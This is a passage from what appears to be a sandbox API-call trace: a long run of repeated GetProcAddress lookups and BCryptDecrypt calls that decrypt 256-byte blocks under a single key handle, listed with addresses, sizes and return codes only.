pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069176, pcbResult=0x14f8fc) returned 0x0 [0179.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.836] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea6bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206926b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206926b, pcbResult=0x14f8fc) returned 0x0 [0179.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.839] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea6cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069360, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069360, pcbResult=0x14f8fc) returned 0x0 [0179.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.842] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea6dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069455, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069455, pcbResult=0x14f8fc) returned 0x0 [0179.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.844] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea6ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206954a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206954a, pcbResult=0x14f8fc) returned 0x0 [0179.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.847] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea6fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206963f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206963f, pcbResult=0x14f8fc) returned 0x0 [0179.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.849] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea70d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069734, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069734, pcbResult=0x14f8fc) returned 0x0 [0179.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.852] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea71d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069829, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069829, pcbResult=0x14f8fc) returned 0x0 [0179.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.854] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea72d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206991e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206991e, pcbResult=0x14f8fc) returned 0x0 [0179.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.857] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea73d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069a13, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069a13, pcbResult=0x14f8fc) returned 0x0 [0179.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.859] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea74d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069b08, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069b08, pcbResult=0x14f8fc) returned 0x0 [0179.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.862] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea75d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069bfd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069bfd, pcbResult=0x14f8fc) returned 0x0 [0179.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.865] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea76d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069cf2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069cf2, pcbResult=0x14f8fc) returned 0x0 [0180.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.124] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea77d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069de7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069de7, pcbResult=0x14f8fc) returned 0x0 [0180.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.127] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea78d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069edc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069edc, pcbResult=0x14f8fc) returned 0x0 [0180.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.130] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea79d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069fd1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069fd1, pcbResult=0x14f8fc) returned 0x0 [0180.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.132] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea7ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206a0c6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206a0c6, pcbResult=0x14f8fc) returned 0x0 [0180.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.135] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea7bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206a1bb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206a1bb, pcbResult=0x14f8fc) returned 0x0 [0180.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.138] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea7cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206a2b0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206a2b0, pcbResult=0x14f8fc) returned 0x0 [0180.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.142] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea7dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206a3a5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206a3a5, pcbResult=0x14f8fc) returned 0x0 [0180.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.144] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea7ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206a49a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206a49a, pcbResult=0x14f8fc) returned 0x0 [0180.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.147] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea7fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206a58f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206a58f, pcbResult=0x14f8fc) returned 0x0 [0180.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.149] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea80d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206a684, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206a684, pcbResult=0x14f8fc) returned 0x0 [0180.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.152] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea81d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206a779, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206a779, pcbResult=0x14f8fc) returned 0x0 [0180.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.614] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea82d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206a86e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206a86e, pcbResult=0x14f8fc) returned 0x0 [0180.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.616] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea83d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206a963, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206a963, pcbResult=0x14f8fc) returned 0x0 [0180.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.822] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea84d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206aa58, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206aa58, pcbResult=0x14f8fc) returned 0x0 [0180.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.825] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea85d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ab4d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ab4d, pcbResult=0x14f8fc) returned 0x0 [0180.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.826] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea86d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ac42, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ac42, pcbResult=0x14f8fc) returned 0x0 [0180.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.828] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea87d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ad37, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ad37, pcbResult=0x14f8fc) returned 0x0 [0180.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.830] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea88d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ae2c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ae2c, pcbResult=0x14f8fc) returned 0x0 [0180.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.832] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea89d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206af21, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206af21, pcbResult=0x14f8fc) returned 0x0 [0180.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.835] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea8ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b016, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b016, pcbResult=0x14f8fc) returned 0x0 [0180.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.838] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea8bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b10b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b10b, pcbResult=0x14f8fc) returned 0x0 [0180.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.840] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea8cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b200, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b200, pcbResult=0x14f8fc) returned 0x0 [0180.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.843] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea8dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b2f5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b2f5, pcbResult=0x14f8fc) returned 0x0 [0180.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.846] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea8ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b3ea, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b3ea, pcbResult=0x14f8fc) returned 0x0 [0180.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.849] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea8fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b4df, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b4df, pcbResult=0x14f8fc) returned 0x0 [0180.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.852] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea90d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b5d4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b5d4, pcbResult=0x14f8fc) returned 0x0 [0180.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0180.854] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea91d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b6c9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b6c9, pcbResult=0x14f8fc) returned 0x0 [0181.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.042] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea92d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b7be, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b7be, pcbResult=0x14f8fc) returned 0x0 [0181.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.048] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea93d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b8b3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b8b3, pcbResult=0x14f8fc) returned 0x0 [0181.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.051] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea94d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206b9a8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206b9a8, pcbResult=0x14f8fc) returned 0x0 [0181.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.054] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea95d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206ba9d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206ba9d, pcbResult=0x14f8fc) returned 0x0 [0181.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.057] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea96d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206bb92, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206bb92, pcbResult=0x14f8fc) returned 0x0 [0181.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.062] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea97d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206bc87, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206bc87, pcbResult=0x14f8fc) returned 0x0 [0181.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.064] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea98d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206bd7c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206bd7c, pcbResult=0x14f8fc) returned 0x0 [0181.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.066] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea99d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206be71, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206be71, pcbResult=0x14f8fc) returned 0x0 [0181.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.069] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea9ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206bf66, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206bf66, pcbResult=0x14f8fc) returned 0x0 [0181.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.074] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea9bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c05b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206c05b, pcbResult=0x14f8fc) returned 0x0 [0181.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.077] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea9cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c150, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206c150, pcbResult=0x14f8fc) returned 0x0 [0181.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.249] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea9dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c245, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206c245, pcbResult=0x14f8fc) returned 0x0 [0181.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.252] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea9ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c33a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206c33a, pcbResult=0x14f8fc) returned 0x0 [0181.256] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.256] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea9fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c42f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206c42f, pcbResult=0x14f8fc) returned 0x0 [0181.260] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.260] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaa0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c524, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206c524, pcbResult=0x14f8fc) returned 0x0 [0181.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.265] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaa1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c619, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206c619, pcbResult=0x14f8fc) returned 0x0 [0181.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.267] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaa2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c70e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206c70e, pcbResult=0x14f8fc) returned 0x0 [0181.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.270] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaa3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c803, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206c803, pcbResult=0x14f8fc) returned 0x0 [0181.277] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.277] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaa4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c8f8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206c8f8, pcbResult=0x14f8fc) returned 0x0 [0181.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0181.346] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1eaa5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206c9ed, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, 